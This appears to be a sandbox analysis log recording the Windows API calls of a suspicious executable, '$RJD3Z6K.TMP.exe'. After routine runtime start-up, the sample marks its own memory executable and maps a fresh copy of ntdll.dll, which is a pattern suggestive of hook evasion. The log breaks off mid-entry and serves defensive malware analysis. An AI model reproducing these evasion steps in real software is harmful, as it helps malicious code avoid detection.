# Flog Txt Version 1 # Analyzer Version: 3.1.1 # Analyzer Build Date: Sep 16 2019 10:43:25 # Log Creation Date: 05.10.2019 01:01:42.669 Process: id = "1" image_name = "$rjd3z6k.tmp.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\$rjd3z6k.tmp.exe" page_root = "0x4cdc3000" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\$RJD3Z6K.TMP.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xa1c [0029.360] GetVersion () returned 0x1db10106 [0029.360] HeapCreate (flOptions=0x1, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1d50000 [0029.365] RtlAllocateHeap (HeapHandle=0x1d50000, Flags=0x0, Size=0x140) returned 0x1d50578 [0029.366] RtlAllocateHeap (HeapHandle=0x1d50000, Flags=0x8, Size=0x41c4) returned 0x1d506c0 [0029.366] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x4) returned 0x1c10000 [0029.366] VirtualAlloc (lpAddress=0x1c10000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c10000 [0029.367] GetStartupInfoA (in: lpStartupInfo=0x18fecc | out: lpStartupInfo=0x18fecc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\$RJD3Z6K.TMP.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0029.367] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0029.367] GetFileType (hFile=0x0) returned 0x0 [0029.367] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0029.367] GetFileType (hFile=0x0) returned 0x0 [0029.367] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0029.367] GetFileType (hFile=0x0) returned 0x0 [0029.367] SetHandleCount (uNumber=0x20) returned 0x20 [0029.367] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\$RJD3Z6K.TMP.exe\" " [0029.367] GetEnvironmentStringsW () returned 0x2756b8* [0029.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0029.367] RtlAllocateHeap (HeapHandle=0x1d50000, Flags=0x0, Size=0x570) returned 0x1d54890 [0029.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1d54890, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0029.367] FreeEnvironmentStringsW (penv=0x2756b8) returned 1 [0029.367] GetACP () returned 0x4e4 [0029.367] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fed0 | out: lpCPInfo=0x18fed0) returned 1 [0029.367] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fea8 | out: lpCPInfo=0x18fea8) returned 1 [0029.367] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0029.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0029.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f74c, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ") returned 256 [0029.367] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0029.367] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0029.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f728, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ") returned 256 [0029.367] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0029.367] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ", cchSrc=256, lpDestStr=0x18f528, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ") returned 256 [0029.368] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01", lpUsedDefaultChar=0x0) returned 256 [0029.368] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0029.368] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ") returned 256 [0029.368] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0029.368] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ", cchSrc=256, lpDestStr=0x18f508, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ") returned 256 [0029.368] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㡬AĀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01", lpUsedDefaultChar=0x0) returned 256 [0029.368] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4136d0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\$RJD3Z6K.TMP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\$rjd3z6k.tmp.exe")) returned 0x36 [0029.368] HeapFree (in: hHeap=0x1d50000, dwFlags=0x0, lpMem=0x1d54890 | out: hHeap=0x1d50000) returned 1 [0029.368] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76c20000 [0029.368] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0029.368] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0029.368] RtlAllocateHeap (HeapHandle=0x1d50000, Flags=0x8, Size=0x800) returned 0x1d54890 [0029.368] GetStartupInfoA (in: lpStartupInfo=0x18ff2c | out: lpStartupInfo=0x18ff2c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\$RJD3Z6K.TMP.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0029.368] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0029.368] GetUserDefaultLangID () returned 0x409 [0029.370] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0029.370] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0029.373] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fcb4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\$RJD3Z6K.TMP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\$rjd3z6k.tmp.exe")) returned 0x36 [0029.373] VirtualProtect (in: lpAddress=0x40a7d4, dwSize=0x821c, flNewProtect=0x40, lpflOldProtect=0x18fde0 | out: lpflOldProtect=0x18fde0*=0x4) returned 1 [0042.814] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0042.815] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0042.815] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0042.815] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0042.816] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0042.816] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0042.817] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fc18 | out: DllHandle=0x18fc18*=0x76c20000) returned 0x0 [0042.817] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0042.823] NtCreateSection (in: SectionHandle=0x18fc58, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0xa4 | out: SectionHandle=0x18fc58*=0xa8) returned 0x0 [0042.823] NtMapViewOfSection (in: SectionHandle=0xa8, ProcessHandle=0xffffffff, BaseAddress=0x18fd04*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fc64*=0x180000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x18fd04*=0x1e60000, SectionOffset=0x0, ViewSize=0x18fc64*=0x180000) returned 0x40000003 [0042.824] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0042.825] VirtualProtect (in: lpAddress=0x1e70047, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.825] VirtualProtect (in: lpAddress=0x1e70047, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.825] VirtualProtect (in: lpAddress=0x1e700c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.826] VirtualProtect (in: lpAddress=0x1e700c8, dwSize=0x4, 